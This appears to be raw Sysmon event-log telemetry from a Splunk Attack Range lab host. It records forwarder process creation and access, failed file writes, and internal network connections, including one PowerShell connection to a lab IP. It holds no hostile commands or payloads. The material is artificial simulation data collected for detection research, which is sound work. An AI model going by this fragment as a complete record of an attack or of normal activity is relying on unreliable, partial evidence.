13:23:37.811{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498751Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:37.811{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A259-6140-B756-04000000C801}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498750Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:37.811{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A259-6140-B756-04000000C801}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498749Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:37.797{B81B27B7-A259-6140-B756-04000000C801}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498771Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:38.879{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A07DFA0518452DD1AC809C72C5A2E829,SHA256=352B63F6E676F7A319CC8E7841A7F06FE59F953F001D0E53EAB11D4723157DD3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498770Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:38.810{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=66F27AB358D14158904424E15ACBA716,SHA256=30682067DC2A33550E52BB9D177B8CB2776612DCC7999E031AFA2F669FCCC102,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498769Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:38.810{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4E2E0F9DEA7EC411B6A13B643EE8F5C0,SHA256=463BBDBCC058CB3E839408118F34151F9BDBB5FF78432E35124EBAA29F81E896,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498768Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:38.664{B81B27B7-A25A-6140-B856-04000000C801}6081380C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498767Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:38.511{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A25A-6140-B856-04000000C801}608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498766Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:38.511{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498765Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:38.511{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498764Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:38.511{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498763Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:38.511{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498762Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:38.511{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A25A-6140-B856-04000000C801}608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498761Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:38.511{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A25A-6140-B856-04000000C801}608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498760Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:38.496{B81B27B7-A25A-6140-B856-04000000C801}608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036498759Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:07.805{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50686-false10.0.1.12-8000- 23542300x800000000000000036498780Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:39.894{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1FD7BF513988558EAF0B7368506395C,SHA256=DA65A8F8F2A1DFA8860F40E82740EADE2C8E5CB6842EC923CCE1B912265ECB08,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498779Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:39.194{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A25B-6140-B956-04000000C801}7052C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498778Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:39.194{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498777Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:39.194{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498776Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:39.194{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498775Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:39.194{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498774Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:39.194{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A25B-6140-B956-04000000C801}7052C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498773Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:39.194{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A25B-6140-B956-04000000C801}7052C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498772Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:39.180{B81B27B7-A25B-6140-B956-04000000C801}7052C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498783Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:40.908{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1AE8036E089EAECC1D6726FCCF9454A,SHA256=43AD5F94CCE435063E867E7257FFB4E165374FE6033DBFFBC03E834BFE62A844,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498782Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:40.593{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=93D140E589E975F9839B2532EA1B0077,SHA256=3CF946737298D91F5AED6D592122B46EF96B5E2B8434A8FCBF0B879D1FADCF2C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498781Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:40.278{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=66F27AB358D14158904424E15ACBA716,SHA256=30682067DC2A33550E52BB9D177B8CB2776612DCC7999E031AFA2F669FCCC102,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498785Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:41.939{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7BD5D940A64A52B54F18AFE6BBD8DBD,SHA256=643FFCFF1C94AC0993E7AE421A6A650DC07D23AC676BEB7DB89BA17EFFD3505E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498784Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:11.249{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50687-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498786Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:42.957{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12050A6CB1F36A4BB8CB9A752B170C55,SHA256=CD1D9B1F52CA1E628B60B84C03FFD186665B23F9D3D83CF36BB3CB398225EA10,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498787Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:43.989{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C75F00E24F2B210B2CB0C6D8B1BDAFD,SHA256=89173B6E78A2EF432357C1FB6BC6DDDE5FA38107897EF00B0EFEC47ECC25A910,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498789Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:44.705{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4536B308CF060E43BD7B64C8C131E3DC,SHA256=BC6F1E6365A0073C50D5D43D6B8D2E29317416C7097E6C33254422AC3E82C92A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498788Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:13.799{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50688-false10.0.1.12-8000- 354300x800000000000000036498791Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 